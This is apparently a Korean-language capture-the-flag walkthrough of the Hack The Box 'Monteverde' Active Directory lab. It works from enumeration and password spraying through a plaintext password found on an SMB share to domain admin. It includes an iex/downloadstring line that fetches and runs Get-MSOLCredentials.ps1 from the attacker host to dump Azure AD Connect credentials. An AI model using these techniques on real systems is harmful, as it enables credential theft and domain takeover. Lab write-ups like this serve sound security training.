1. 정찰
1.1. nmap 정찰
정찰 결과 389 등의 포트가 개방중이므로 AD 환경임을 유추할 수 있고, 80등의 포트가 없으므로 웹페이지 등에서 수집할 정보가 없음을 확인했다. 따라서 공유 폴더 등이 있는지를 식별하고 접근할 예정이다. 도메인은 MEGABANK.LOCAL 정도 임만을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# nmap -sC -sV 10.129.228.111
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-20 11:28 +04
Nmap scan report for 10.129.228.111
Host is up (0.18s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-20 07:29:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-12-20T07:29:18
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -2s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.84 seconds
1.2. rpcclient 를 통한 계정 정보 습득
rpcclient 를 통해 접근했을 때 enumdomusers 를 통해 내부 계정들에 대해서 정보를 획득할 수 있었다.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# rpcclient -U ""%"" 10.129.228.111
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
rpcclient $>
1.3. 실패한 정찰
1.3.1. smbmap
smbmap 을 통해 확인했으나 익명 계정으로는 공유되는 폴더가 아무것도 없었다.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# smbmap -H 10.129.228.111
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.129.228.111, no fun for you...
[*] Closed 1 connections
1.3.2. smbclient
smbclient 를 이용해서 확인했을 때도 익명으로 공유되는 폴더는 식별할 수 없었다.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# smbclient -N -L //10.129.228.111
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.111 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
1.4. 결론
현재 가지고 있는 정보는 도메인 정보와 계정 정보 뿐이다. 따라서 앞서 실습했던 Sauna Labs 에서 실시했던 GetNPUsers 를 통해서 계정 중에 해쉬값을 받아올 수 있는 것이 있는지 확인할 것이다.
2. 내부망 침투
2.1. GetNPUsers - 실패
GetNPUsers 를 통해서 접근을 시도했을 때 PREAUTH 가 셋팅된 계정은 존재하지 않아서 계정에 대해서 해쉬값을 받아올 수 없었다.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# impacket-GetNPUsers 'MEGABANK.LOCAL/' -usersfile users -format hashcat -outputfile hash -dc-ip 10.129.228.111
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
2.2. nxc 를 이용한 smb 의 ID/PW 같은 경우 식별
가장 흔히 하는 실수가 아이디와 비밀번호가 같을 수도 있다는 사실이다. 따라서 users 파일에 대해서 아이디와 계정이 같은 경우가 있는 지를 nxc 를 통해서 자동으로 돌린다. 수동으로 해도 상관은 없지만 귀찮으므로 자동화 툴을 이용한다. 그 결과는 아래와 같다.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# nxc smb 10.129.228.111 -u users -p users --continue-on-success
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
[...SNIP...]
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-ata:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-bexec:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-netapp:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\dgalanos:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\smorgan:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:SABatchJobs STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:SABatchJobs STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:SABatchJobs STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-ata:SABatchJobs STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-bexec:SABatchJobs STATUS_LOGON_FAILURE
[...SNIP...]
위의 결과에서 SABatchJobs 계정에 대해서 아이디와 비밀번호가 같다는 사실을 확인할 수 있었다.
2.3. smbclient 를 통한 공유폴더 확인
2.3.1. evil-winrm 테스트
계정의 크리덴셜을 확보했으므로 evil-winrm 을 통해 RCE가 되는지 확인했으나 접근되지 않는 모습을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# evil-winrm -i 10.129.228.111 -u SABatchJobs -p SABatchJobs
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
2.3.2. smbclient 를 통한 공유폴더 확인
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# smbclient -L \\10.129.228.111 -U SABatchJobs
Password for [WORKGROUP\SABatchJobs]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
azure_uploads Disk
C$ Disk Default share
E$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
users$ Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.111 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
2.4. 내부 폴더 확인
smbclient 를 통해서 공유 폴더를 확인했으며, users 폴더가 크리덴셜 관련한 정보가 있을 것으로 추정되므로 해당 폴더 내부를 확인한다. 그 중에 mhope 계정에서 azure.xml 파일이 눈에 띈다.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# smbclient '//10.129.228.111/users$' -U SABatchJobs%SABatchJobs
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> ls
. D 0 Fri Jan 3 17:12:48 2020
.. D 0 Fri Jan 3 17:12:48 2020
dgalanos D 0 Fri Jan 3 17:12:30 2020
mhope D 0 Fri Jan 3 17:41:18 2020
roleary D 0 Fri Jan 3 17:10:30 2020
smorgan D 0 Fri Jan 3 17:10:24 2020
\dgalanos
. D 0 Fri Jan 3 17:12:30 2020
.. D 0 Fri Jan 3 17:12:30 2020
\mhope
. D 0 Fri Jan 3 17:41:18 2020
.. D 0 Fri Jan 3 17:41:18 2020
azure.xml AR 1212 Fri Jan 3 17:40:23 2020
\roleary
. D 0 Fri Jan 3 17:10:30 2020
.. D 0 Fri Jan 3 17:10:30 2020
\smorgan
. D 0 Fri Jan 3 17:10:24 2020
.. D 0 Fri Jan 3 17:10:24 2020
31999 blocks of size 4096. 28979 blocks available
smb: \>
2.5. mhope 계정 크리덴셜 확보
mhope 계정의 azure.xml 파일을 다운 받은 후 확인해 보면 Password 와 관련한 태그를 확인할 수 있다.
smb: \> cd mhope
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \mhope\> ^C
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# cat azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
2.6. user.txt flag 획득
이를 바탕으로 evil-winrm 을 통해 mhope 계정으로 접근하면 user.txt 파일을 통해 flag 를 획득할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# evil-winrm -i 10.129.228.111 -u mhope -p 4n0therD4y@n0th3r$
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> type ../Desktop/user.txt
3. 권한 상승
3.1. mhope 계정 권한 확인
먼저 mhope 계정에 대해서 개인 권한과 그룹 권한을 확인한다.
3.1.1. whoami /priv
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
3.1.2. whoami /groups
그룹 권한에 대해서 확인하면 MEGABANK\Azure Admins 가 눈에 띄는 것을 확인할 수 있다.
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
3.1.3. net user mhope
또한 mhope 계정에 대한 상세 정보를 확인할 때 Azure Admins 에 가입된 거를 마찬가지로 확인할 수 있다.
*Evil-WinRM* PS C:\Users\mhope\Documents> net user mhope
User name mhope
Full Name Mike Hope
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/2/2020 3:40:05 PM
Password expires Never
Password changeable 1/3/2020 3:40:05 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory \\monteverde\users$\mhope
Last logon 1/3/2020 5:29:59 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Azure Admins *Domain Users
The command completed successfully.
3.2. winPEAS - 실패
Sauna 모듈에서 winPEAS 를 통해서 접근을 시도했으므로 마찬가지로 비슷하게 접근을 시도한다. 하지만 x64 버전을 통해서 접근이 되지 않았다.
*Evil-WinRM* PS C:\Users\mhope\Documents> .\winPEASx64.exe cmd fast > winPEASfast
Program 'winPEASx64.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1
+ .\winPEASx64.exe cmd fast > winPEASfast
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\winPEASx64.exe cmd fast > winPEASfast
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
아키텍쳐를 확인해서 64bit 임을 확인했으나 정상작동하지 않았다.
*Evil-WinRM* PS C:\Users\mhope\Documents> $env:PROCESSOR_ARCHITECTURE
AMD64
그래서 x86 버전으로 시도했고 winPEASfast 파일을 만드는 데에 성공했다.
*Evil-WinRM* PS C:\Users\mhope\Documents> .\winPEASx86.exe cmd fast > winPEASfast
하지만 Pass 와 같은 키워드를 검색했을 때 비밀번호가 나오지 않아서 의미가 없었다.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# strings -e l winPEASfast | grep "Pass"
[1;32mEnumerating saved credentials in Registry (CurrentPass)
LimitBlankPasswordUse : 1
Password Last Set : 1/2/2020 2:18:38 PM
Password Last Set : 1/1/1970 12:00:00 AM
Password Last Set : 1/2/2020 2:06:03 PM
Password Last Set : 1/2/2020 2:53:24 PM
Password Last Set : 1/2/2020 3:40:05 PM
Password Last Set : 1/3/2020 4:48:46 AM
Password Last Set : 1/3/2020 4:58:31 AM
Password Last Set : 1/3/2020 4:59:55 AM
Password Last Set : 1/3/2020 5:01:42 AM
Password Last Set : 1/3/2020 5:06:10 AM
Password Last Set : 1/3/2020 5:08:05 AM
Password Last Set : 1/3/2020 5:09:21 AM
[1;32mPassword Policies
[1;37m MaxPasswordAge:
[1;37m MinPasswordAge:
[1;37m MinPasswordLength:
[1;37m PasswordHistoryLength:
[1;37m PasswordProperties:
[1;37m MaxPasswordAge:
[1;37m MinPasswordAge:
[1;37m MinPasswordLength:
[1;37m PasswordHistoryLength:
[1;37m PasswordProperties:
@umpass.inf,%UmPass.SVCDESC%;Microsoft UMPass Driver(@umpass.inf,%UmPass.SVCDESC%;Microsoft UMPass Driver)[
Google Password Sync? No
Disable Password Saving : True
[1;32mCached GPP Passwords
3.3. Azure AD Connect
우리는 mhope 계정이 Azure Admins 그룹에 속한다는 사실을 알았으므로 Azure AD Connect 서비스에 가입된 것을 유추할 수 있다. 해당 서비스는 Azure 와 AD 계정이 동기화 될 수 있게 하는 서비스이다. 해당 서비스를 이용하고 있으므로 Get-MSOLCredentials.ps1 파일을 써야 된다는 것을 추론할 수 있다.
*Evil-WinRM* PS C:\Users\mhope\Documents> iex(new-object net.webclient).downloadstring('http://10.10.14.143/Get-MSOLCredentials.ps1')
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
위와 같이 한 번에 관리자 계정을 습득할 수 있다.
3.4. admin flag 획득
위에서 얻은 관리자 계정으로 접근을 evil-winrm 을 통해서 할 수 있고 root.txt 파일을 찾아서 flag 를 획득할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# evil-winrm -i 10.129.228.111 -u administrator -p d0m@in4dminyeah!
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt